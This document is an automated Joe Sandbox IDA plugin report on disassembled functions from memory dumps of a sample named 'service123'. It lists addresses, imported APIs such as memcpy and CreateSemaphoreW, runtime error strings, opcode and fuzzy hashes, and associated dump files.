Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::replace
API String ID: 3510742995-3564965661
Opcode ID: ddf545c42ee5a5804dc79e010bcca13cd5e3c04c0dea4fd3993e03d582de94bb
Instruction ID: 24821c0dddd33125e8a9bae1c8c327c0305522ce094d4929c0a8bc8e98924662
Opcode Fuzzy Hash: ddf545c42ee5a5804dc79e010bcca13cd5e3c04c0dea4fd3993e03d582de94bb
Instruction Fuzzy Hash: 33812476A092159FCB00DF6DC98069EBBF1AF88354F15C92EE89997710E331D984CB92

Function 6CA4D810 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 153stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6CA6F8C0: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6F95D
Part of subcall function 6CA6F8C0: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA4DA2E), ref: 6CA6F988

strlen.MSVCRT ref: 6CA4D8E5
memcpy.MSVCRT ref: 6CA4D9BE

Strings

Unknown error, xrefs: 6CA4D85E
iostream error, xrefs: 6CA4DA12

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memcpy$memmovestrlen
String ID: Unknown error$iostream error
API String ID: 1234831610-3609051425
Opcode ID: ff77061ed43c3eefbc0f3a0a804770578e5cdf25b3db6e054ee8acb8cb2e92c4
Instruction ID: a12938d6b97e75e6286a5a75192be470e9ffa5c939573f5abe48ecace54f8bb9
Opcode Fuzzy Hash: ff77061ed43c3eefbc0f3a0a804770578e5cdf25b3db6e054ee8acb8cb2e92c4
Instruction Fuzzy Hash: 6761D1B0904308CFDB04DFA9C58469EBBF1BF88314F24C92ED4989B755E7749889CB92

Function 6C9DF840 Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9DF85F
ReleaseSemaphore.KERNEL32 ref: 6C9DF8E3

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: ReleaseSemaphoremalloc
String ID:
API String ID: 755742884-0
Opcode ID: 053ef1c82864965efb3680fddbc83dfb8137d93b52c0155846af0de2424b8cbc
Instruction ID: 3130d902fc4fa99b08794ae21a3e28880d9779e672f0a65ed0cba268ac55acf5
Opcode Fuzzy Hash: 053ef1c82864965efb3680fddbc83dfb8137d93b52c0155846af0de2424b8cbc
Instruction Fuzzy Hash: EE314D70A097029FEB08DF29E54970A7BF4BF46318F16C65DE8A997280D334E546CB92

Function 6C9DFCE0 Relevance: 7.6, APIs: 5, Instructions: 78synchronizationCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C9DFCEC
ReleaseSemaphore.KERNEL32 ref: 6C9DFD7C
CreateSemaphoreW.KERNEL32 ref: 6C9DFDC7
WaitForSingleObject.KERNEL32 ref: 6C9DFE10

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: Semaphore$CreateObjectReleaseSingleWaitmalloc
String ID:
API String ID: 2768075653-0
Opcode ID: 2bbe698074d70770141697f06764a8539a5020fa481568bcad80c80356921d18
Instruction ID: 64698301efd6525eeec127e4d073e8322090646d44b6daf235e6212487e083ee
Opcode Fuzzy Hash: 2bbe698074d70770141697f06764a8539a5020fa481568bcad80c80356921d18
Instruction Fuzzy Hash: 22315B70A057038FDB089F6DE54970A7BF4BB46318F16C25CE8A99B280D334E406CF92

Function 6CA98520 Relevance: 7.6, APIs: 5, Instructions: 64stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6CA98535
strlen.MSVCRT ref: 6CA98583
memcpy.MSVCRT ref: 6CA985A0
setlocale.MSVCRT ref: 6CA985B4
setlocale.MSVCRT ref: 6CA985EA

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: setlocale$memcpystrlen
String ID:
API String ID: 4096897932-0
Opcode ID: e33e672bc7f0bb44a0916d8d0838a8fc5cd5c580106dcef55ac8e8930bae9cad
Instruction ID: fd778685410ec634f59eb640888b587974832847fc0c54251f8737115b43a177
Opcode Fuzzy Hash: e33e672bc7f0bb44a0916d8d0838a8fc5cd5c580106dcef55ac8e8930bae9cad
Instruction Fuzzy Hash: 5F21E4B06093519FD340EF69D58069EFBE4EFA8658F05896EE5C8C7701E734C9849F82

Function 6C9E9530 Relevance: 7.6, APIs: 5, Instructions: 59COMMON

Download Yara Rule

APIs

_lock.MSVCRT ref: 6C9E9549
_unlock.MSVCRT ref: 6C9E9571
calloc.MSVCRT ref: 6C9E95BF

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: _lock_unlockcalloc
String ID:
API String ID: 3876498383-0
Opcode ID: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction ID: ac08728247e17e51402778bef198f0cb7df89d3d50bf428d401ae09fbe9df7f3
Opcode Fuzzy Hash: 2d85fe9eb4c66546544eacb675d5450fb1bd51e5c271a4006a92a239dbcf87c3
Instruction Fuzzy Hash: 7B114CB1504211CFD7429F28C4807D6BBE4BFA9344F168569D898CF745EF74D844CB92

Function 6C9E0290 Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9E02BC
TlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C9E04DE), ref: 6C9E02CA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C9E04DE), ref: 6C9E0300

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: AllocCreateErrorLastSemaphore
String ID:
API String ID: 2256031600-0
Opcode ID: 00139557a4ebb9479ea7446a145ac7c6db2288e8827592a03f190dd21f17fd85
Instruction ID: bce4419bc789e45a0f4ce1e6d597803395e11be2eb6ca7edf5ab2488ac576e5e
Opcode Fuzzy Hash: 00139557a4ebb9479ea7446a145ac7c6db2288e8827592a03f190dd21f17fd85
Instruction Fuzzy Hash: 38F03AB05087429FD7057FB9C50835A7AB0BF66328F408A1CE0B98BA90E734C00ACF52

Function 00794BFA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

(null), xrefs: 00794C27
@, xrefs: 00794647

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: a3932296d87f62e2dc00a99fc3ce536abfd19b8dd85d81fb26c410d4276f9e88
Instruction ID: 5fd1e9cf608915d856d4c76285917ba65a62d95be0b2a467a109adb4f8a995f9
Opcode Fuzzy Hash: a3932296d87f62e2dc00a99fc3ce536abfd19b8dd85d81fb26c410d4276f9e88
Instruction Fuzzy Hash: 9EA18F756083958BCF319F24E090BAAB7E1BF85318F158A1DE8D897342D739D907DB82

Function 6C9E52CA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 242COMMON

Download Yara Rule

Strings

@, xrefs: 6C9E4D17
(null), xrefs: 6C9E52F7

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: (null)$@
API String ID: 0-1380778734
Opcode ID: 9f3a3a56b8b577bb5b4e9f9029fa1a05d70be3522b84bd67061aa950eed81b7f
Instruction ID: a884ad79ad84f0ecf9ef18d3adf4cebe92941ea036e1a578c822b52092eeaba8
Opcode Fuzzy Hash: 9f3a3a56b8b577bb5b4e9f9029fa1a05d70be3522b84bd67061aa950eed81b7f
Instruction Fuzzy Hash: BEA19F7160C395CBD722CF64D09079ABBE5BFA9308F158A1DE8D88B741D735D90ACB82

Function 00791B00 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 211COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00791C20
Unknown pseudo relocation bit size %d., xrefs: 00791C6D
Unknown pseudo relocation protocol version %d., xrefs: 00791DF3

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 422b7b62a17db98f8582dc961a4ba67c0628fc1a2e6a699df9cf4ff465dc9312
Instruction ID: 4b8984ebdd8ef106814ab2a8b5709414d7115afff04191eb19e7af2be189d1d2
Opcode Fuzzy Hash: 422b7b62a17db98f8582dc961a4ba67c0628fc1a2e6a699df9cf4ff465dc9312
Instruction Fuzzy Hash: 6681B371A10606DBCF10DF28E880669B7F2FF85350F958629D898A7355E338E825CBD6

Function 6C9DA850 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 187COMMON

Download Yara Rule

Strings

%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 6C9DA970
Unknown pseudo relocation protocol version %d., xrefs: 6C9DAB43
Unknown pseudo relocation bit size %d., xrefs: 6C9DA9BD

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
API String ID: 0-1286557213
Opcode ID: 2493614c7aa9b2bc82f6360009f6554e1205def4cbd156aaa7b61f11bb48fa86
Instruction ID: 785f653603586aa2ec4c7988c0cb3f7d0f8a3c0efbd5cb232dc98a6016542ee3
Opcode Fuzzy Hash: 2493614c7aa9b2bc82f6360009f6554e1205def4cbd156aaa7b61f11bb48fa86
Instruction Fuzzy Hash: C7717C32A11A1ADFCB00CF69D58079AB7B5BF44344F06C6A9E854BBB44DB30F8658B91

Function 007980D8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 007980F2
strchr.MSVCRT ref: 00798102
atoi.MSVCRT ref: 00798113

Strings

., xrefs: 007980F7

Memory Dump Source

Source File: 00000005.00000002.2565535527.0000000000791000.00000020.00000001.01000000.00000005.sdmp, Offset: 00790000, based on PE: true

Associated: 00000005.00000002.2565509432.0000000000790000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565552997.000000000079A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565569379.000000000079E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2565585320.00000000007A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_790000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction ID: 13e1264f2d92976ab3db8ee7f666f484a6b3212adf93af0347589fa22871f0f2
Opcode Fuzzy Hash: ada1008d35e41e10e64cf9da6c6253745884d5c573850742e5c05c36619c67f5
Instruction Fuzzy Hash: E3E0ECB19447058ADB80BF38D90A31ABAE1AB82300F498C6CE48887245EB7D98469753

Function 6C9E9128 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19stringCOMMON

Download Yara Rule

APIs

setlocale.MSVCRT ref: 6C9E9142
strchr.MSVCRT ref: 6C9E9152
atoi.MSVCRT ref: 6C9E9163

Strings

., xrefs: 6C9E9147

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: atoisetlocalestrchr
String ID: .
API String ID: 1223908000-248832578
Opcode ID: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction ID: 555d59ffcfc460b116f1ea6d14d936da7153e280b37cde5193bff208a0f27c36
Opcode Fuzzy Hash: c2b570a3904f17255e6178cae360b51e0f0771d8f4e0b0ba75ebf925efdecfd1
Instruction Fuzzy Hash: 4DE08CB09047218ADB007F3CC4083DAB6E1BFB4308F86886CC48887700E739C4088742

Function 6C9E9293 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 6C9E929F
GetProcAddress.KERNEL32 ref: 6C9E92B3

Strings

advapi32.dll, xrefs: 6C9E9298
SystemFunction036, xrefs: 6C9E92A8

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SystemFunction036$advapi32.dll
API String ID: 2574300362-1354007664
Opcode ID: 2eb351ca182b7d1b513175f4a629998d565c974a00710e9ab9d247efd26a4dc9
Instruction ID: 8b771b8e1ae67e81a0714fbd9936c1af3dc16930ea0133e690162f00e3e9f7c6
Opcode Fuzzy Hash: 2eb351ca182b7d1b513175f4a629998d565c974a00710e9ab9d247efd26a4dc9
Instruction Fuzzy Hash: F5E086B1C44301CFCB00AFBCA50604ABFF0BA06324F01892ED485D7600D334D455CB97

Function 6C9E1409 Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 482COMMON

Download Yara Rule

Strings

5, xrefs: 6C9E14D2

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID:
String ID: 5
API String ID: 0-2226203566
Opcode ID: a82c2c16d2d7949772e6f842b215fe874475218e1203ea01590d05b24c9f0b6c
Instruction ID: f67aa90ea6e4f8e22e8563a285558590f2bf31b6e03f9a3ea7d160727cb5f0dd
Opcode Fuzzy Hash: a82c2c16d2d7949772e6f842b215fe874475218e1203ea01590d05b24c9f0b6c
Instruction Fuzzy Hash: 28220075A087418FC725CF69C48475AFBE1BFA9308F158A2EE8D897711EB74E844CB42

Function 6C9DA340 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C9DA3C5
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,6C9EC41C), ref: 6C9DA3E0
free.MSVCRT ref: 6C9DA3EA

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: 7d5c29857b458ffba322109e9585a3fe0abe375eb31f19c1093e9c12e3652972
Instruction ID: 9475aeab23fab87278826eababb9428b57ba55b489d32cad931848c1a330910c
Opcode Fuzzy Hash: 7d5c29857b458ffba322109e9585a3fe0abe375eb31f19c1093e9c12e3652972
Instruction Fuzzy Hash: 5531C67160AF118BD3009F19D48435FBBE5EFE1759F238A2CD9A067B40DB31E4558781

Function 6CA25C40 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 308COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA25D74
memchr.MSVCRT ref: 6CA25D93

Part of subcall function 6CA98520: setlocale.MSVCRT ref: 6CA98535

Strings

., xrefs: 6CA25D85
-, xrefs: 6CA25F72

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: -$.
API String ID: 4291329590-3807043784
Opcode ID: a1318cae556d88e69884b0917a3848d25faca653c3d89b4e216f01a47ad628cf
Instruction ID: 5efa31c7cc76f8ec39ea258131f2a1ef332d9e16717c2a52ef556b0be65ed7c7
Opcode Fuzzy Hash: a1318cae556d88e69884b0917a3848d25faca653c3d89b4e216f01a47ad628cf
Instruction Fuzzy Hash: B2D12AB19087199FCB00DFA8C48459EBBF1BF48314F19862AE8A4E7755D734D989CB41

Function 6CA26080 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 306COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 6CA261AE
memchr.MSVCRT ref: 6CA261CD

Part of subcall function 6CA98520: setlocale.MSVCRT ref: 6CA98535

Strings

., xrefs: 6CA261BF
6, xrefs: 6CA263B6

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: memchrmemcpysetlocale
String ID: .$6
API String ID: 4291329590-4089497287
Opcode ID: 6d15cd7d22c8f1604b9f3e84eeaef34410b62e23a622881e35c3fbcc5348f50a
Instruction ID: 9c1c6150d267d94cfa81f1ad082b7c1f72275d0ca41dddf07bb0aa83295eeddc
Opcode Fuzzy Hash: 6d15cd7d22c8f1604b9f3e84eeaef34410b62e23a622881e35c3fbcc5348f50a
Instruction Fuzzy Hash: E0D149B0D097598FCB00DFA8C48068EBBF1BF48314F19862AE8A4E7751D734E949CB91

Function 6CAA0F90 Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 283stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6CAA0FD5

Strings

basic_string::append, xrefs: 6CAA104D, 6CAA1059, 6CAA114C, 6CAA120C

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
